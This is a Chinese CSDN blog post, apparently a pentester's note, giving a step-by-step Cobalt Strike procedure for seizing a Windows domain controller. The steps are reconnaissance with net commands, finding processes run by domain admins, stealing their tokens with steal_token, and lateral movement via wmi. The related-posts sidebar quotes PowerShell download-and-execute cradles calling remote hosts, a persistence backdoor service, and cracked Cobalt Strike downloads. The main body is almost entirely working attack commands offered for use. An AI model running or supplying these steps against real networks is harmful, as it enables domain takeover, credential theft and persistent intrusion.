利用cobalt strike获取域控权限

最新推荐文章于 2024-03-11 20:48:05 发布
最新推荐文章于 2024-03-11 20:48:05 发布
阅读量2.2k 收藏 4
点赞数 2
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mirror97black/article/details/79796288
版权

cobalt strike

cobalt strike是一个后渗透工具,和msf有很多相似的地方,也可以看做是一个远控工具。

前期准备

获取一个cobalt strike的会话。可以利用cs本身的payload,或者是通过别的shell反弹到cs。

域内收集信息

通过一些cmd命令,可以收集到域内的信息
在cs的会话中,执行命令
查看有多少域和工作组

shell net view /domain

查看域管理员

shell net group "domain admins" /domain

查看域控制器

shell net group "domain controllers" /domain

查看时间服务器,一般是主域

shell net time /domain

获取域控权限

查看进程,同时观察每个进程的用户

ps

或者使用

shell tasklist /v

如果发现某些进程的用户为域管理员
可以通过以下方式,来获取域管理员权限

steal_token pid(进程的pid)

命令成功之后,验证一下能否连接共享文件

shell dir \\test.domain.com\c$

还可以查看当前的权限

getuid

获取域控的会话,远程连接

wmi test.domain.com listenername(监听的名字)

执行成功后,可以发现域控制器已经上线

mirror97black
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CobaltStrike4.4.zip
09-15
CobaltStrike4.4
【远控使用】Cobalt Strike横向渗透域控
孤桜懶契
09-11 1980
categories: 知识积累 top: FALSE copyright: true abbrlink: 1643719980 #date: '2021-8-7 12:00:00' #description:1400x780 tags: 内网渗透 提权 渗透测试 黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png 前言 Cobalt Strike.
Cobalt Strike(九)域内渗透
qq_56426046的博客
09-24 611
系统备注kaliteamserver10.10.10.4域控10.10.10.6本次测试的重点victim 被控端。
[渗透工具——Cobalt Strike]
最新发布
个人学习参考
03-11 1004
本篇文章仅作为本人学习笔记,如有问题请各位大佬指正!选项作用新建连接设置视图(枢纽试图、会话列表、目标列表 )VPN接口Listeners监听脚本管理器Close关闭。
ms14-068提权域控
技术超强的网络安全平台
09-15 671
msf ms14-068 提权域控 上传ms14-068.exe到目标主机的目录上 upload /root/wwwhack23/ms14-068.exe C:/phpstudy_pro/www/www/www.webhack123.com/ms14-068.exe 这些信息从metasploit 前期信息来的,可以翻到上面查看 ms14-068.exe -u [email protected] -s S-1-5-21-2005268815-658469957-1189185684-1103 -d 10.1
Cobalt Strike的安装及获取靶机控制权(攻击)
dgjkkhcf的博客
07-25 1798
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。......
Cobalt Strike RCE漏洞浅析
热门推荐
m0_49443776的博客
12-04 62万+
本次我们要讲的是前段时间传的比较火的Cobalt Strike RCE漏洞分析...
内网渗透攻防-cobalt strike全部功能使用2
weixin_46626737的博客
06-30 242
然后复制到要攻击的目标机器上:shell copy C:\\windows\123.exe(以控制机器-上传上的地址) \\database(目标机器域内名称)\C$\\windows\1.exe(目标机器-想要传到的地址)比如拿下了内网机器,是双网卡,既通外网,也通内网,就可以使用代理,右键点击中转,选择listener选项,payload选择tcp,listenhost填写双网卡的内网地址,端口是跳板机器的端口,会话选择这个跳板机的会话。krbtgt的hash密码-通过minikatz来获取
Cobalt Strike权限提升
yyj1781572的博客
11-18 1078
Cobalt Strike权限提升
Cobaltstrike系列教程(十一)提权与横向移动
J0o1ey Blog
01-19 6287
0x001-提权 1.右键菜单提权: 选择beacon,右键,执行–>提权 我由于加载了插件,所以比官方多了几种提权方式 插件下载请看我之前的帖子 ms14-058/ms15-051/ms16-016/ms16-032 这些都是大家耳熟能详...
cobaltstrike中文版.zip
05-17
cobaltstrike中文版.zip
CobaltStrike4.7
11-29
cobalt strike(简称CS)是一款...Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。
cobaltstrike4.0-cracked.zip
07-04
这是Cobalt Strike4.0的无后门版本,该版本仅供学习使用,请勿用于非法途径,请时刻遵守国家法律。
Cobalt-Strike-4.7
12-27
Cobalt Strike 是一款使用java编写,C / S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透,是一个为对手模拟和红队行动而设计的平台,主要用于执行有目标的攻击和模拟高级威胁者的后...
mimikatz使用
mirror97black的博客
04-11 6860
mimikatz使用时需要高权限,至少是administrator权限 mimikatz抓取密码的命令需要system权限,可以先进行提权 privilege::debug //提升权限(从administrator提升到system) 抓取hash sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行) lsadump::lsa ...
cobalt strike开机自启动后门
mirror97black的博客
04-09 4884
前提:拿到cobalt strike的session 设置开机自启动服务 使用sc命令创建服务 sc create "Windows Power" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.1...
windows命令行下载文件
mirror97black的博客
04-03 3473
vbs下载 通过写一个vbs脚本来下载文件 在windows机器中,命令行执行以下各条命令 echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs echo Post.Open "GET","htt...
msf传递shell给cobalt strike
mirror97black的博客
04-11 2218
前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))" 方法2:通过msf的expl...
cobaltstrike 客户端 zsh权限不够
03-27
如果您在使用 Cobalt Strike 客户端时遇到 zsh 权限不够的问题,您可以尝试以下方法: 1. 确认您是否具有足够的权限来运行 zsh。您可以尝试使用 sudo 命令来以管理员身份运行 zsh,例如: sudo zsh 2. 如果您已经...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值